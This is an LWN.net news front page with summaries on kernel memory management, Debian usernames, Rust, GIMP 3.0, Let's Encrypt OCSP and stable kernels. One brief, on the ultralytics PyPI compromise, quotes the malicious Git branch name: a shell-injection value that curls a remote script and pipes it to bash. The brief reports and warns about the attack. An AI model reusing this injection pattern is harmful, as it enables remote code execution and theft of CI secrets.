Welcome to LWN.net
LWN.net is a reader-supported news site dedicated to producing the best coverage from within the Linux and free software development communities. See the LWN FAQ for more information, and please consider subscribing to gain full access and support our activities.
[$] Freezing out the page reference count
The page structure sits at the core of the kernel's memory-management subsystem (for now), and a key part of that structure is its reference count, stored in refcount. The page reference count tells the kernel how many users a given page has and when it can be freed. That count is not needed for every page in the system, though. Matthew Wilcox has recently resurrected an old patch set that expands the concept of a "frozen" page — one that lacks a meaningful reference count — to the immediate benefit of the slab allocator but in the service of a longer-term goal as well.
[$] Debian opens a can of username worms
It has long been said that naming things is one of the hard things to do in computer science. That may be so, but it pales in comparison to the challenge of handling usernames properly in applications. This is especially true when multiple applications are involved, and they are all supposed to agree on what characters are, and are not, allowed. The Debian project is facing that problem right now, as two user-creation utilities disagreed about which names are allowable. A plan is in place to sort this out before the release of Debian 13 ("trixie") sometime next year.
[$] LWN.net Weekly Edition for December 5, 2024
Posted Dec 5, 2024 0:34 UTC (Thu)The LWN.net Weekly Edition for December 5, 2024 is available.
Inside this week's LWN.net Weekly Edition
- Front: Rust in Git; Arch PKGBUILDs; Command-line commotion; 6.13 Merge window; RWF_UNCACHED; Incremental Rust compilation; GIMP 3.0.
- Briefs: Kernel CoC; ARM32 security; Elementary OS 8; Nixos 24.11; Firefox 133.0; Hurl 6.0.0; PHP 8.4.1; Rust 1.83.0; Giving thanks; Quotes; ...
- Announcements: Newsletters, conferences, security updates, patches, and more.
[$] The return of RWF_UNCACHED
Linux offers two broad ways of performing I/O to files. Buffered I/O, which is the usual way of accessing a file, stores a copy of the transferred data in the kernel's page cache to speed future accesses. Direct I/O, instead, moves data directly between the storage device and a user-space buffer, avoiding the page cache. Both modes have their advantages and disadvantages. In 2019, Jens Axboe proposed an uncached buffered mode to get some of the advantages of both, but that effort stalled at the time. Now, uncached buffered I/O is back with some impressive performance results behind it.
[$] Rust's incremental compiler architecture
The traditional structure of a compiler forms a pipeline — parsing, type-checking, optimization, and code-generation, usually in that order. But modern programming languages have requirements that are ill-suited to such a design. Increasingly, compilers are moving toward other designs in order to support incremental compilation and low-latency responses for uses like integration into IDEs. Rust has, for the last eight years, been pursuing a particularly unusual design; in that time compile times have substantially improved, but there's still more work to be done.
[$] The rest of the 6.13 merge window
The 6.13 merge window closed with the release of 6.13-rc1 on December 1. By that time, 11,307 non-merge commits had been pulled into the mainline repository; about 9,500 of those landed after our first-half merge-window summary was written. There was a lot of new material in these patches, including architecture-support improvements, new BPF features, an efficient way to add guard pages to an address space, more Rust support, a vast number of new device drivers, and more.
[$] GIMP 3.0 — a milestone for open-source image editing
The long-awaited release of the GNU Image Manipulation Program (GIMP) 3.0 is on the way, marking the first major update since version 2.10 was released in April 2018. It now features a GTK 3 user interface and GIMP 3.0 introduces significant changes to the core platform and plugins. This release also brings performance and usability improvements, as well as more compatibility with Wayland and complex input sources.
[$] The kernel's command-line commotion
For the most part, the 6.13 merge window has gone smoothly, with relatively few problems or disagreements — other than this one, of course. There is one other exception, though, relating to the kernel's presentation of a process's command line to interested user-space observers when a relatively new system call is used. A pull request with a simple change to make that information more user-friendly ran afoul of Linus Torvalds, who has his own view of how it should be managed.
[$] Arch Linux finally starts licensing PKGBUILDs
Arch Linux is popular as a base for other Linux distributions; examples of Arch-derivatives include EndeavourOS, Manjaro, Parabola, and SteamOS. There's one small problem: the control files used to describe how to build packages for Arch Linux have no stated license. That creates a bit of uncertainty about the rights and responsibilities for the downstream derivatives. So far, that doesn't seem to have been a problem, nor has it stopped other projects from assuming that reuse is allowed. However, the Arch project is looking to add some clarity by explicitly assigning a liberal license to its package sources. Currently the project is in the process of reaching out to contributors to see if they have any objections.
[$] NonStop discussion around adding Rust to Git
The Linux kernel community's discussions about including Rust have gotten a lot of attention, but the kernel is not the only project wrestling with the question of whether to allow Rust. The Git project discussed the prospect in January, and then again at the Git Contributor's Summit in September. Complicating the discussion is the Git project's lack of a policy on platform support, and the fact that it does already have tools written in other languages. While the project has not committed to using or avoiding Rust, it seems like only a matter of time until maintainers will have to make a decision.
Abusing Git branch names to compromise a PyPI package
A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script. The GitHub account "OpenIM Robot" (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name:
openimbot:$({curl,-sSfL,raw.github user content.com/ultra lytics/ ultra lytics/ 12e4f5 4ca3 f2e6 9bcdc 900d 1c6e 16642 ca8ae 545/file.sh}${IFS}|${IFS}bash)
Unfortunately, ultralytics uses the pull_request_target GitHub Action trigger to automate some of its continuous integration tasks. This runs a script from the base branch of the repository, which has access to the repository's secrets — but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already pulled the malicious script.
This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.
A single stable kernel to fix boot problems
Greg Kroah-Hartman released version 6.12.3 of the kernel to fix a regression that can cause some machines to fail to boot on version 6.12.2. The other stable branches are continuing on their normal cadence, with 6.12.4-rc1 and 6.6.64-rc1 starting review today.
Security updates for Friday
Security updates have been issued by AlmaLinux (firefox, postgresql, postgresql:12, postgresql:13, postgresql:15, postgresql:16, python3:3.6.8, and thunderbird), Debian (clamav), Fedora (pam), Red Hat (firefox, postgresql:13, postgresql:15, python-tornado, redis:7, ruby, ruby:2.5, and ruby:3.1), SUSE (avahi, docker-stable, java-1_8_0-openjdk, libmozjs-128-0, obs-scm-bridge, php8, and teleport), and Ubuntu (ghostscript, needrestart, and shiro).
Apertis v2024 released
Apertis is a Collabora-developed Debian derivative distribution designed to be incorporated into electronic devices; the v2024 release is now available. It is now based on the Bookworm release, and includes support for Podman, ONNX Runtime, OP-TEE, and more.
Apertis relies on the Debian Free Software Guidelines to ensure all software shipped is open source or, in limited cases, at least freely distributable. However, for some customers this is not enough to be able to adopt OSS solutions as in their evaluations some provisions in common licenses like the GPL-3 are at odds with regulatory constraints they are subject to. Apertis does not set to solve this decades-long debate, and instead its goal is to increase the adoption of modern, maintained OSS solutions in markets where this has historically been a challenge. To enable this, Apertis supports avoiding the use of any software under some licenses (like the [GPL v3.0 license family) on target images, while still making them fully available for development and for customers that do not share those licensing concerns. To avoid these licenses, Apertis uses more modern alternatives instead of relying on outdated and unmaintained pre-GPL-3 versions. For instance, coreutils and findutils (GPL-3+) are replaced in Apertis by rust-coreutils and rust-findutils.
Let's Encrypt sets date for ending OCSP support
In July, Let's Encrypt announced it was ending
support "as soon as possible
" for the Online
Certificate Status Protocol (OCSP) in favor of Certificate
Revocation Lists (CRLs) due to privacy concerns. The organization
has now announced
that it has set a timeline, and will be turning off its OCSP
responders on August 6, 2025. There is additional action required
for Let's Encrypt users who use the OCSP Must Staple Extension:
As of January 30, 2025, issuance requests that include the OCSP Must Staple extension will fail, unless the requesting account has previously issued a certificate containing the OCSP Must Staple extension.
As of May 7, all issuance requests that include the OCSP Must Staple extension will fail, including renewals. Please change your ACME client configuration to not request the extension.
‘Tis the Season for COSMIC Alpha 4! (System76 Blog)
System76 has announced the fourth alpha release of its Rust-based COSMIC desktop. New features in this version include the ability to set default applications, region and language settings, a new Accessibility applet, as well as support for variable refresh rate (VRR) in the cosmic-comp compositor and the display settings tool. See the blog post for a full list of fixes and performance improvements. LWN covered the first alpha release in August.
Mozilla's new branding strategy
Mozilla would appear to have concluded that the solution to its problems is an extensive rebranding effort:
We teamed up with global branding powerhouse Jones Knowles Ritchie (JKR) to revamp our brand and revitalize our intentions across our entire ecosystem. At the heart of this transformation is making sure people know Mozilla for its broader impact, as well as Firefox. Our new brand strategy and expression embody our role as a leader in digital rights and innovation, putting people over profits through privacy-preserving products, open-source developer tools, and community-building efforts.
Stable kernels 6.12.2, 6.11.11, and 4.19.325
Greg Kroah-Hartman has released the 6.12.2, 6.11.11, and 4.19.325 stable kernels. Note that both
6.11.11 and 4.19.325 are the last kernels in those series, "please move
off to a newer kernel version
". In the 4.19.325 release notice, he has
a rather longer-than-usual message, including:
As a "fun" proof that this one is finished (and that any company saying they care about it really should have their statements validated with facts), I looked at the "unfixed" CVEs from this kernel release. Currently it is a list 983 CVEs long, too long to list here.You can verify it yourself by cloning the vulns.git repo at git.kernel.org and running:
./scripts/strak v4.19.325Note, this does NOT count the hardware CVEs which kernel.org does not track, and many are sill unfixed in this kernel branch.
Security updates for Thursday
Security updates have been issued by Fedora (thunderbird, tuned, and webkitgtk), Mageia (python-aiohttp and qemu), Oracle (container-tools:ol8, firefox, java-1.8.0-openjdk, java-11-openjdk, kernel, kernel:4.18.0, krb5, pam, postgresql:16, python-tornado, python3:3.6.8, thunderbird, tigervnc, tuned, and webkit2gtk3), Red Hat (bzip2, postgresql, postgresql:13, postgresql:15, postgresql:16, python-tornado, and ruby:3.1), Slackware (python3), SUSE (postgresql, postgresql16, postgresql17, postgresql13, postgresql14, postgresql15, python-python-multipart, and python3), and Ubuntu (python-django and recutils).
Fedora moves towards Forgejo (Fedora Magazine)
Fedora Project Leader Matthew Miller reports that the project's search to replace Pagure as its git forge is almost complete, with the Fedora Council strongly in favor of Forgejo:
The Council, currently, has a clear preference for Forgejo. This is a big decision and we don't want it to feel rushed. Therefore, we're opening this up one last time to everyone's comments. After two weeks, we'll take our formal vote — and then get on with the work!
LWN looked at Forgejo in February.